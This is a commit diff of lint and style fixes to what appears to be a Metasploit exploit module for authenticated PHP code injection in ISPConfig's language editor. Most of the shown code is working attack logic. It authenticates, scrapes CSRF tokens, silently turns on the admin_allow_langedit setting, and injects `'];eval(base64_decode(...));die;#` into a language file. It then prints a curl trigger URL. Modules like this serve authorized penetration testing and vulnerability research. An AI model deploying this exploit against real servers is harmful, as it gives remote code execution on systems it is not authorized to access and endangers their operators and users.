fixed: rubocop issues, changes resolved

happybear-21 · happybear-21 · commit 1700b2eaaa96 · 2025-07-03T21:25:19.000+05:30
diff --git a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -19,11 +19,11 @@ def initialize(info = {})
           language_edit.php file. The vulnerability occurs when the `admin_allow_langedit`
           setting is enabled, allowing authenticated administrators to inject arbitrary
           PHP code through the language editor interface.
-          
+
           This module will automatically check if the required `admin_allow_langedit`
           permission is enabled, and attempt to enable it if it's disabled (requires
           admin credentials with system configuration access).
-          
+
           The exploit works by injecting a PHP payload into a language file, which
           is then executed when the file is accessed. The payload is base64 encoded
           and written using PHP's file_put_contents function.
@@ -59,7 +59,7 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
         }
       )
     )
@@ -74,6 +74,7 @@ def initialize(info = {})
   def check
     print_status('Checking if the target is ISPConfig...')
     return CheckCode::Unknown('Failed to login') unless authenticate
+
     # Always try to log in and parse version, since credentials are required
     # cookie_jar.clear (handled in exploit)
     # Try to access the dashboard or settings page
@@ -88,11 +89,11 @@ def check
       version_element = doc.at('//p[@class="frmTextHead"]')
       if version_element
         version_text = version_element.text
-        version = version_text.split(":")[1].gsub(" ","")
+        version = version_text.split(':')[1].gsub(' ', '')
         version = Rex::Version.new(version)
         if version < Rex::Version.new('3.2.11p1')
           print_good("ISPConfig version detected: #{version_text}")
-          return CheckCode::Vulnerable("Version: #{version_text}")
+          return CheckCode::Appears("Version: #{version_text}")
         end
       end
     end
@@ -112,15 +113,17 @@ def authenticate
       'keep_cookies' => true
     })
     return false unless res
+
     if res&.code == 302
       res = send_request_cgi({
         'method' => 'GET',
-         'uri' => normalize_uri(target_uri.path, 'login/',res&.headers.fetch('Location',nil))
+        'uri' => normalize_uri(target_uri.path, 'login/', res&.headers&.fetch('Location', nil))
       })
     end
-    return false if res.body.match(/Username or Password wrong/i)
-    if res.headers.fetch('Location',nil)&.include?('admin') ||
-       res.body.downcase.include?('dashboard')
+    body_downcase = res.body.downcase.freeze
+    return false if body_downcase.include?('username or password wrong')
+
+    if res.headers.fetch('Location', nil)&.include?('admin') || body_downcase.include?('dashboard')
       print_good('Login successful!')
       return true
     end
@@ -130,15 +133,15 @@ def authenticate
 
   def check_langedit_permission
     print_status('Checking if admin_allow_langedit is enabled...')
-    
+
     # Try to access the language editor to see if it's accessible
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => edit_url,
       'keep_cookies' => true
     })
-    
+
     if res&.code == 200 && res.body.include?('language_edit')
       print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
       return true
@@ -153,44 +156,44 @@ def check_langedit_permission
 
   def enable_langedit_permission
     print_status('Attempting to enable admin_allow_langedit...')
-    
+
     # Try to access the system settings page
     settings_url = normalize_uri(target_uri.path, 'admin', 'system_config.php')
     res = send_request_cgi({
       'method' => 'GET',
       'uri' => settings_url,
       'keep_cookies' => true
     })
-    
+
     unless res && res.code == 200
       print_warning('Could not access system configuration page')
       return false
     end
-    
+
     doc = res.get_html_document
     csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
     csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
-    
+
     unless csrf_id && csrf_key
       print_warning('Could not extract CSRF tokens from system config page')
       return false
     end
-    
+
     # Try to enable the setting
     enable_data = {
       '_csrf_id' => csrf_id,
       '_csrf_key' => csrf_key,
       'admin_allow_langedit' => '1',
       'action' => 'save'
     }
-    
+
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => settings_url,
       'vars_post' => enable_data,
       'keep_cookies' => true
     })
-    
+
     if res && res.code == 200
       print_good('Successfully enabled admin_allow_langedit')
       return true
@@ -205,7 +208,7 @@ def inject_payload
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
     b64_payload = Base64.strict_encode64(payload.encoded)
     injection = "'];eval(base64_decode('#{b64_payload}'));die;#"
-    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
+    lang_file = Rex::Text.rand_text_alpha_lower(10) + '.lng'
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
       'lang' => 'en',
@@ -249,27 +252,27 @@ def inject_payload
   def exploit
     cookie_jar.clear
     fail_with(Failure::NoAccess, 'Authentication failed') unless authenticate
-    
+
     # Check if language editor permissions are enabled
     unless check_langedit_permission
       print_warning('admin_allow_langedit appears to be disabled')
       print_status('Attempting to enable admin_allow_langedit...')
-      
+
       if enable_langedit_permission
         print_good('Successfully enabled admin_allow_langedit, retrying exploit...')
         # Re-check permissions after enabling
         unless check_langedit_permission
-          fail_with(Failure::UnexpectedReply, 'Failed to enable admin_allow_langedit or language editor still not accessible')
+          fail_with(Failure::NoAccess, 'Failed to enable admin_allow_langedit or language editor still not accessible')
         end
       else
         fail_with(Failure::UnexpectedReply, 'Could not enable admin_allow_langedit - exploit requires this setting to be enabled')
       end
     end
-    
+
     payload_url = inject_payload
     print_status('Starting payload handler...')
     print_status('Manual trigger information:')
     print_line("URL: #{full_uri}#{payload_url}")
     print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
   end
-end 
+end
